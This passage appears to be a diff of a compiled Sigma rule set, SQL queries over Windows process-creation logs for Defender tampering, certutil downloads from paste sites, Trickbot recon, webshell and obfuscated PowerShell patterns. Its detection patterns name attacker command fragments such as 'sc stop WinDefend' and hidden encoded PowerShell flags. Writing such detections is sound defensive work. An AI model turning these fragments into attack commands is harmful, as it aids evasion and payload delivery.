IAA%' ESCAPE '\\' OR CommandLine LIKE '% IAB%' ESCAPE '\\' OR CommandLine LIKE '% UwB%' ESCAPE '\\' OR CommandLine LIKE '% cwB%' ESCAPE '\\')) OR CommandLine LIKE '%.exe -ENCOD %' ESCAPE '\\') AND NOT (CommandLine LIKE '% -ExecutionPolicy%' ESCAPE '\\' AND CommandLine LIKE '%remotesigned %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine LIKE '%-DisableBehaviorMonitoring $true%' ESCAPE '\\' OR CommandLine LIKE '%-DisableRuntimeMonitoring $true%' ESCAPE '\\')) OR ((NewProcessName LIKE '%\\\\sc.exe' ESCAPE '\\' OR OriginalFileName = 'sc.exe') AND ((CommandLine LIKE '%stop%' ESCAPE '\\' AND CommandLine LIKE '%WinDefend%' ESCAPE '\\') OR (CommandLine LIKE '%delete%' ESCAPE '\\' AND CommandLine LIKE '%WinDefend%' ESCAPE '\\') OR (CommandLine LIKE '%config%' ESCAPE '\\' AND CommandLine LIKE '%WinDefend%' ESCAPE '\\' AND CommandLine LIKE '%start=disabled%' ESCAPE '\\')))))" ], - "filename": "proc_creation_win_powershell_base64_encoded_cmd.yml" + "filename": "proc_creation_win_powershell_disable_defender_av_security_monitoring.yml" }, { - "title": "Potential Dtrack RAT Activity", - "id": "f1531fa4-5b84-4342-8f68-9cf3fdbd83d4", - "status": "stable", - "description": "Detects potential Dtrack RAT activity via specific process patterns", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", + "title": "Rundll32 JS RunHTMLApplication Pattern", + "id": "9f06447a-a33a-4cbe-a94f-a3f43184a7a3", + "status": "test", + "description": "Detects suspicious command line patterns used when rundll32 is used to run JavaScript code", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.impact", - "attack.t1490" + "attack.defense_evasion" ], "falsepositives": [ "Unlikely" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%ping -n %' ESCAPE '\\' AND CommandLine LIKE '% echo EEEE > %' ESCAPE '\\') OR (CommandLine LIKE '%ipconfig /all%' ESCAPE '\\' AND CommandLine LIKE '%\\\\temp\\\\res.ip%' ESCAPE '\\') OR (CommandLine LIKE '%interface ip show config%' ESCAPE '\\' AND CommandLine LIKE '%\\\\temp\\\\netsh.res%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%rundll32%' ESCAPE '\\' AND CommandLine LIKE '%javascript%' ESCAPE '\\' AND CommandLine LIKE '%..\\\\..\\\\mshtml,RunHTMLApplication%' ESCAPE '\\') OR CommandLine LIKE '%;document.write();GetObject(\"script%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_malware_dtrack.yml" + "filename": "proc_creation_win_rundll32_js_runhtmlapplication.yml" }, { - "title": "REvil Kaseya Incident Malware Patterns", - "id": "5de632bc-7fbd-4c8a-944a-fce55c59eae5", - "status": "test", - "description": "Detects process command line patterns and locations used by REvil group in Kaseya incident (can also match on other malware)", - "author": "Florian Roth (Nextron Systems)", + "title": "Suspicious File Downloaded From File-Sharing Website Via Certutil.EXE", + "id": "42a5f1e7-9603-4f6d-97ae-3f37d130d794", + "status": "experimental", + "description": "Detects the execution of certutil with certain flags that allow the utility to download files from file-sharing websites.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059", - "attack.g0115" + "attack.defense_evasion", + "attack.t1027" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%C:\\\\Windows\\\\cert.exe%' ESCAPE '\\' OR CommandLine LIKE '%del /q /f c:\\\\kworking\\\\agent.crt%' ESCAPE '\\' OR CommandLine LIKE '%Kaseya VSA Agent Hot-fix%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\MsMpEng.exe%' ESCAPE '\\' OR CommandLine LIKE '%rmdir /s /q \\%SystemDrive\\%\\\\inetpub\\\\logs%' ESCAPE '\\' OR CommandLine LIKE '%del /s /q /f \\%SystemDrive\\%\\\\%.log%' ESCAPE '\\' OR CommandLine LIKE '%c:\\\\kworking1\\\\agent.exe%' ESCAPE '\\' OR CommandLine LIKE '%c:\\\\kworking1\\\\agent.crt%' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\MsMpEng.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\cert.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\kworking\\\\agent.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\kworking1\\\\agent.exe' ESCAPE '\\') OR (CommandLine LIKE '%del /s /q /f%' ESCAPE '\\' AND CommandLine LIKE '%WebPages\\\\Errors\\\\webErrorLog.txt%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR OriginalFileName = 'CertUtil.exe') AND (CommandLine LIKE '%urlcache %' ESCAPE '\\' OR CommandLine LIKE '%verifyctl %' ESCAPE '\\') AND (CommandLine LIKE '%.ghostbin.co/%' ESCAPE '\\' OR CommandLine LIKE '%.hastebin.com%' ESCAPE '\\' OR CommandLine LIKE '%.paste.ee%' ESCAPE '\\' OR CommandLine LIKE '%anonfiles.com%' ESCAPE '\\' OR CommandLine LIKE '%cdn.discordapp.com/attachments/%' ESCAPE '\\' OR CommandLine LIKE '%ddns.net%' ESCAPE '\\' OR CommandLine LIKE '%gist.githubusercontent.com%' ESCAPE '\\' OR CommandLine LIKE '%mediafire.com%' ESCAPE '\\' OR CommandLine LIKE '%mega.nz%' ESCAPE '\\' OR CommandLine LIKE '%paste.ee%' ESCAPE '\\' OR CommandLine LIKE '%pastebin.com%' ESCAPE '\\' OR CommandLine LIKE '%pastebin.pl%' ESCAPE '\\' OR CommandLine LIKE '%pastetext.net%' ESCAPE '\\' OR CommandLine LIKE '%privatlab.com%' ESCAPE '\\' OR CommandLine LIKE '%privatlab.net%' ESCAPE '\\' OR CommandLine LIKE '%raw.githubusercontent.com%' ESCAPE '\\' OR CommandLine LIKE '%send.exploit.in%' ESCAPE '\\' OR CommandLine LIKE '%sendspace.com%' ESCAPE '\\' OR CommandLine LIKE '%storage.googleapis.com%' ESCAPE '\\' OR CommandLine LIKE '%transfer.sh%' ESCAPE '\\' OR CommandLine LIKE '%ufile.io%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_apt_revil_kaseya.yml" + "filename": "proc_creation_win_certutil_download_file_sharing_domains.yml" }, { - "title": "Suspicious Program Location Whitelisted In Firewall Via Netsh.EXE", - "id": "a35f5a72-f347-4e36-8895-9869b0d5fc6d", + "title": "Pingback Backdoor Activity", + "id": "b2400ffb-7680-47c0-b08a-098a7de7e7a9", "status": "test", - "description": "Detects Netsh command execution that whitelists a program located in a suspicious location in the Windows Firewall", - "author": "Sander Wiebing, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community", + "description": "Detects the use of Pingback backdoor that creates ICMP tunnel for C2 as described in the trustwave report", + "author": "Bhabesh Raj", "tags": [ - "attack.defense_evasion", - "attack.t1562.004" + "attack.persistence", + "attack.t1574.001" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\netsh.exe' ESCAPE '\\' OR OriginalFileName = 'netsh.exe') AND ((CommandLine LIKE '%firewall%' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\' AND CommandLine LIKE '%allowedprogram%' ESCAPE '\\') OR (CommandLine LIKE '%advfirewall%' ESCAPE '\\' AND CommandLine LIKE '%firewall%' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\' AND CommandLine LIKE '%rule%' ESCAPE '\\' AND CommandLine LIKE '%action=allow%' ESCAPE '\\' AND CommandLine LIKE '%program=%' ESCAPE '\\')) AND (CommandLine LIKE '%\\%Public\\%\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\%TEMP\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%TMP\\%%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\$Recycle.bin\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\RECYCLER\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\SystemVolumeInformation\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Users\\\\Default\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Users\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\addins\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\cursors\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\debug\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\drivers\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\fonts\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\help\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\system32\\\\tasks\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\Tasks\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Local Settings\\\\Temporary Internet Files\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temporary Internet Files\\\\Content.Outlook\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\updata.exe' ESCAPE '\\' AND CommandLine LIKE '%config%' ESCAPE '\\' AND CommandLine LIKE '%msdtc%' ESCAPE '\\' AND CommandLine LIKE '%start%' ESCAPE '\\' AND CommandLine LIKE '%auto%' ESCAPE '\\')" ], - "filename": "proc_creation_win_netsh_fw_allow_program_in_susp_location.yml" + "filename": "proc_creation_win_malware_pingback_backdoor.yml" }, { - "title": "Potential Raspberry Robin Dot Ending File", - "id": "a35c97c8-d9c4-4c89-a3e7-533dc0bcb73a", - "status": "experimental", - "description": "Detects commandline containing reference to files ending with a \".\" This scheme has been seen used by raspberry-robin", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Trickbot Malware Reconnaissance Activity", + "id": "410ad193-a728-4107-bc79-4419789fcbf8", + "status": "test", + "description": "Detects potential reconnaissance activity used by Trickbot malware. Trickbot enumerates domain/network topology and executes certain commands automatically every few minutes.", + "author": "David Burkett, Florian Roth", "tags": [ - "attack.execution" + "attack.discovery", + "attack.t1482" ], "falsepositives": [ - "Unknown" + "Rare System Admin Activity" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine REGEXP '\\\\[a-zA-Z0-9]{1,32}\\.[a-zA-Z0-9]{1,6}\\.[ \"']{1}')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\nltest.exe' ESCAPE '\\' AND CommandLine LIKE '%/domain\\_trusts /all\\_trusts%' ESCAPE '\\')" ], - "filename": "proc_creation_win_malware_raspberry_robin_single_dot_ending_file.yml" + "filename": "proc_creation_win_malware_trickbot_recon_activity.yml" }, { - "title": "Abusing IEExec To Download Payloads", - "id": "9801abb8-e297-4dbf-9fbd-57dde0e830ad", - "status": "experimental", - "description": "Detects execution of the IEExec utility to download payloads", - "author": "Nasreddine Bencherchali (Nextron Systems)", - "falsepositives": [ - "Unknown" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\IEExec.exe' ESCAPE '\\' OR OriginalFileName = 'IEExec.exe') AND (CommandLine LIKE '%https://%' ESCAPE '\\' OR CommandLine LIKE '%http://%' ESCAPE '\\'))" - ], - "filename": "proc_creation_win_lolbin_ieexec_download.yml" - }, - { - "title": "Powershell Token Obfuscation - Process Creation", - "id": "deb9b646-a508-44ee-b7c9-d8965921c6b6", - "status": "experimental", - "description": "Detects TOKEN OBFUSCATION technique from Invoke-Obfuscation", - "author": "frack113", + "title": "HackTool - DInjector PowerShell Cradle Execution", + "id": "d78b5d61-187d-44b6-bf02-93486a80de5a", + "status": "test", + "description": "Detects the use of the Dinject PowerShell cradle based on the specific flags", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1027.009" + "attack.t1055" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine REGEXP '\\w+`(\\w+|-|.)`[\\w+|\\s]' OR CommandLine REGEXP '\"(\\{\\d\\})+\"\\s*-f' OR CommandLine REGEXP '\\$\\{((e|n|v)*`(e|n|v)*)+:path\\}|\\$\\{((e|n|v)*`(e|n|v)*)+:((p|a|t|h)*`(p|a|t|h)*)+\\}|\\$\\{env:((p|a|t|h)*`(p|a|t|h)*)+\\}'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '% /am51%' ESCAPE '\\' AND CommandLine LIKE '% /password%' ESCAPE '\\')" ], - "filename": "proc_creation_win_powershell_token_obfuscation.yml" + "filename": "proc_creation_win_hktl_dinjector.yml" }, { - "title": "File Download with Headless Browser", - "id": "0e8cfe08-02c9-4815-a2f8-0d157b7ed33e", + "title": "Invoke-Obfuscation Obfuscated IEX Invocation", + "id": "4bf943c6-5146-4273-98dd-e958fd1e3abf", "status": "test", - "description": "This is an unusual method to download files. It starts a browser headless and downloads a file from a location. This can be used by threat actors to download files.", - "author": "Sreeman, Florian Roth", + "description": "Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the following code block", + "author": "Daniel Bohannon (@Mandiant/@FireEye), oscd.community", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (NewProcessName LIKE '%\\\\msedge.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\chrome.exe' ESCAPE '\\') AND CommandLine LIKE '%--headless%' ESCAPE '\\' AND CommandLine LIKE '%dump-dom%' ESCAPE '\\' AND CommandLine LIKE '%http%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine REGEXP '\\$PSHome\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$PSHome\\[' OR CommandLine REGEXP '\\$ShellId\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$ShellId\\[' OR CommandLine REGEXP '\\$env:Public\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$env:Public\\[' OR CommandLine REGEXP '\\$env:ComSpec\\[(\\s*\\d{1,3}\\s*,){2}' OR CommandLine REGEXP '\\*mdr\\*\\W\\s*\\)\\.Name' OR CommandLine REGEXP '\\$VerbosePreference\\.ToString\\(' OR CommandLine REGEXP '\\[String\\]\\s*\\$VerbosePreference'))" ], - "filename": "proc_creation_win_browsers_chromium_headless_file_download.yml" + "filename": "proc_creation_win_hktl_invoke_obfuscation_obfuscated_iex_commandline.yml" }, { - "title": "UAC Bypass Using NTFS Reparse Point - Process", - "id": "39ed3c80-e6a1-431b-9df3-911ac53d08a7", + "title": "Rundll32 Execution Without Parameters", + "id": "5bb68627-3198-40ca-b458-49f973db8752", "status": "test", - "description": "Detects the pattern of UAC Bypass using NTFS reparse point and wusa.exe DLL hijacking (UACMe 36)", - "author": "Christian Burkard (Nextron Systems)", + "description": "Detects rundll32 execution without parameters as observed when running Metasploit windows/smb/psexec exploit module", + "author": "Bartlomiej Czyz, Relativity", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.lateral_movement", + "attack.t1021.002", + "attack.t1570", + "attack.execution", + "attack.t1569.002" ], "falsepositives": [ - "Unknown" + "False positives may occur if a user called rundll32 from CLI with no options" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '\"C:\\\\Windows\\\\system32\\\\wusa.exe\" /quiet C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\update.msu' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System')) OR (ParentCommandLine LIKE '\"C:\\\\Windows\\\\system32\\\\dism.exe\" /online /quiet /norestart /add-package /packagepath:\"C:\\\\Windows\\\\system32\\\\pe386\" /ignorecheck' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System') AND CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\dismhost.exe {%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\DismHost.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine IN ('rundll32.exe', 'rundll32'))" ], - "filename": "proc_creation_win_uac_bypass_ntfs_reparse_point.yml" + "filename": "proc_creation_win_rundll32_without_parameters.yml" }, { - "title": "Use NTFS Short Name in Image", - "id": "3ef5605c-9eb9-47b0-9a71-b727e6aa5c3b", - "status": "experimental", - "description": "Detect use of the Windows 8.3 short name. Which could be used as a method to avoid Image based detection", - "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", + "title": "Scheduled Task Executing Powershell Encoded Payload from Registry", + "id": "c4eeeeae-89f4-43a7-8b48-8d1bdfa66c78", + "status": "test", + "description": "Detects the creation of a schtask that executes a base64 encoded payload stored in the Windows Registry using PowerShell.", + "author": "pH-T (Nextron Systems), @Kostastsale, @TheDFIRReport", "tags": [ - "attack.defense_evasion", - "attack.t1564.004" + "attack.execution", + "attack.persistence", + "attack.t1053.005", + "attack.t1059.001" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%~1.exe%' ESCAPE '\\' OR NewProcessName LIKE '%~1.bat%' ESCAPE '\\' OR NewProcessName LIKE '%~1.msi%' ESCAPE '\\' OR NewProcessName LIKE '%~1.vbe%' ESCAPE '\\' OR NewProcessName LIKE '%~1.vbs%' ESCAPE '\\' OR NewProcessName LIKE '%~1.dll%' ESCAPE '\\' OR NewProcessName LIKE '%~1.ps1%' ESCAPE '\\' OR NewProcessName LIKE '%~1.js%' ESCAPE '\\' OR NewProcessName LIKE '%~1.hta%' ESCAPE '\\' OR NewProcessName LIKE '%~2.exe%' ESCAPE '\\' OR NewProcessName LIKE '%~2.bat%' ESCAPE '\\' OR NewProcessName LIKE '%~2.msi%' ESCAPE '\\' OR NewProcessName LIKE '%~2.vbe%' ESCAPE '\\' OR NewProcessName LIKE '%~2.vbs%' ESCAPE '\\' OR NewProcessName LIKE '%~2.dll%' ESCAPE '\\' OR NewProcessName LIKE '%~2.ps1%' ESCAPE '\\' OR NewProcessName LIKE '%~2.js%' ESCAPE '\\' OR NewProcessName LIKE '%~2.hta%' ESCAPE '\\') AND NOT ((ParentProcessName LIKE '%\\\\WebEx\\\\WebexHost.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\thor\\\\thor64.exe' ESCAPE '\\' OR ParentProcessName LIKE '%-installer.exe' ESCAPE '\\') OR NewProcessName LIKE '%\\\\vcredi%' ESCAPE '\\' OR ParentProcessName LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR OriginalFileName = 'schtasks.exe') AND (CommandLine LIKE '%/Create%' ESCAPE '\\' AND CommandLine LIKE '%FromBase64String%' ESCAPE '\\' AND CommandLine LIKE '%Get-ItemProperty%' ESCAPE '\\' AND (CommandLine LIKE '%HKCU:%' ESCAPE '\\' OR CommandLine LIKE '%HKLM:%' ESCAPE '\\' OR CommandLine LIKE '%registry::%' ESCAPE '\\' OR CommandLine LIKE '%HKEY\\_%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_susp_ntfs_short_name_use_image.yml" + "filename": "proc_creation_win_schtasks_reg_loader.yml" }, { - "title": "Chopper Webshell Process Pattern", - "id": "fa3c117a-bc0d-416e-a31b-0c0e80653efb", - "status": "experimental", - "description": "Detects patterns found in process executions cause by China Chopper like tiny (ASPX) webshells", - "author": "Florian Roth (Nextron Systems), MSTI (query)", + "title": "Suspicious MSHTA Child Process", + "id": "03cc0c25-389f-4bf8-b48d-11878079f1ca", + "status": "test", + "description": "Detects a suspicious process spawning from an \"mshta.exe\" process, which could be indicative of a malicious HTA script execution", + "author": "Michael Haag", "tags": [ - "attack.persistence", - "attack.t1505.003", - "attack.t1018", - "attack.t1033", - "attack.t1087" + "attack.defense_evasion", + "attack.t1218.005", + "car.2013-02-003", + "car.2013-03-001", + "car.2014-04-003" ], "falsepositives": [ - "Unknown" + "Printer software / driver installations", + "HP software" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\w3wp.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\w3wp.exe' ESCAPE '\\') AND (CommandLine LIKE '%&ipconfig&echo%' ESCAPE '\\' OR CommandLine LIKE '%&quser&echo%' ESCAPE '\\' OR CommandLine LIKE '%&whoami&echo%' ESCAPE '\\' OR CommandLine LIKE '%&c:&echo%' ESCAPE '\\' OR CommandLine LIKE '%&cd&echo%' ESCAPE '\\' OR CommandLine LIKE '%&dir&echo%' ESCAPE '\\' OR CommandLine LIKE '%&echo [E]%' ESCAPE '\\' OR CommandLine LIKE '%&echo [S]%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ParentProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' AND ((NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bash.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\') OR OriginalFileName IN ('Cmd.Exe', 'PowerShell.EXE', 'pwsh.dll', 'wscript.exe', 'cscript.exe', 'Bash.exe', 'reg.exe', 'REGSVR32.EXE', 'bitsadmin.exe')))" ], - "filename": "proc_creation_win_webshell_chopper.yml" + "filename": "proc_creation_win_mshta_susp_child_processes.yml" }, { - "title": "Tor Client/Browser Execution", - "id": "62f7c9bf-9135-49b2-8aeb-1e54a6ecc13c", + "title": "Winrar Execution in Non-Standard Folder", + "id": "4ede543c-e098-43d9-a28f-dd784a13132f", "status": "test", - "description": "Detects the use of Tor or Tor-Browser to connect to onion routing networks", - "author": "frack113", + "description": "Detects a suspicious winrar execution in a folder which is not the default installation folder", + "author": "Florian Roth (Nextron Systems), Tigzy", "tags": [ - "attack.command_and_control", - "attack.t1090.003" + "attack.collection", + "attack.t1560.001" ], "falsepositives": [ - "Unknown" + "Legitimate use of WinRAR in a folder of a software that bundles WinRAR" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (NewProcessName LIKE '%\\\\tor.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Tor Browser\\\\Browser\\\\firefox.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\rar.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\winrar.exe' ESCAPE '\\') OR Description = 'Command line RAR') AND NOT ((NewProcessName LIKE '%\\\\WinRAR%' ESCAPE '\\' OR NewProcessName LIKE '%C:\\\\Windows\\\\Temp%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\UnRAR.exe%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_browsers_tor_execution.yml" + "filename": "proc_creation_win_winrar_execution.yml" }, { - "title": "NodejsTools PressAnyKey Lolbin", - "id": "a20391f8-76fb-437b-abc0-dba2df1952c6", - "status": "test", - "description": "Detects a certain command line flag combination used by Microsoft.NodejsTools.PressAnyKey.exe that can be used to execute any other binary", - "author": "Florian Roth (Nextron Systems)", + "title": "HackTool - Wmiexec Default Powershell Command", + "id": "022eaba8-f0bf-4dd9-9217-4604b0bb3bb0", + "status": "experimental", + "description": "Detects the execution of PowerShell with a specific flag sequence that is used by the Wmiexec script", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", "attack.defense_evasion", - "attack.t1218" + "attack.lateral_movement" ], "falsepositives": [ - "Other tools with the same command line flag combination", - "Legitimate uses as part of Visual Studio development" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%Microsoft.NodejsTools.PressAnyKey.exe normal %' ESCAPE '\\' OR (CommandLine LIKE '%.exe normal %' ESCAPE '\\' AND CommandLine LIKE '%.exe' ESCAPE '\\')) AND NOT ((NewProcessName LIKE '%\\\\Microsoft\\\\NodeJsTools\\\\NodeJsTools%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%-NoP -NoL -sta -NonI -W Hidden -Exec Bypass -Enc%' ESCAPE '\\')" ], - "filename": "proc_creation_win_lolbin_pressaynkey.yml" + "filename": "proc_creation_win_hktl_wmiexec_default_powershell.yml" }, { - "title": "Remote Access Tool - ScreenConnect Backstage Mode Anomaly", - "id": "7b582f1a-b318-4c6a-bf4e-66fe49bf55a5", + "title": "Suspicious Script Execution From Temp Folder", + "id": "a6a39bdb-935c-4f0a-ab77-35f4bbf44d33", "status": "experimental", - "description": "Detects suspicious sub processes started by the ScreenConnect client service, which indicates the use of the so-called Backstage mode", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects a suspicious script executions from temporary folder", + "author": "Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton", "tags": [ - "attack.command_and_control", - "attack.t1219" + "attack.execution", + "attack.t1059" ], "falsepositives": [ - "Case in which administrators are allowed to use ScreenConnect's Backstage mode" + "Administrative scripts" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%ScreenConnect.ClientService.exe' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\') AND (CommandLine LIKE '%\\\\Windows\\\\Temp%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temporary Internet%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Roaming\\\\Temp%' ESCAPE '\\' OR CommandLine LIKE '%\\%TEMP\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%TMP\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%LocalAppData\\%\\\\Temp%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '% >%' ESCAPE '\\' OR CommandLine LIKE '%Out-File%' ESCAPE '\\' OR CommandLine LIKE '%ConvertTo-Json%' ESCAPE '\\' OR CommandLine LIKE '%-WindowStyle hidden -Verb runAs%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\system32\\\\config\\\\systemprofile\\\\AppData\\\\Local\\\\Temp\\\\Amazon\\\\EC2-Windows\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_remote_access_tools_screenconnect_anomaly.yml" + 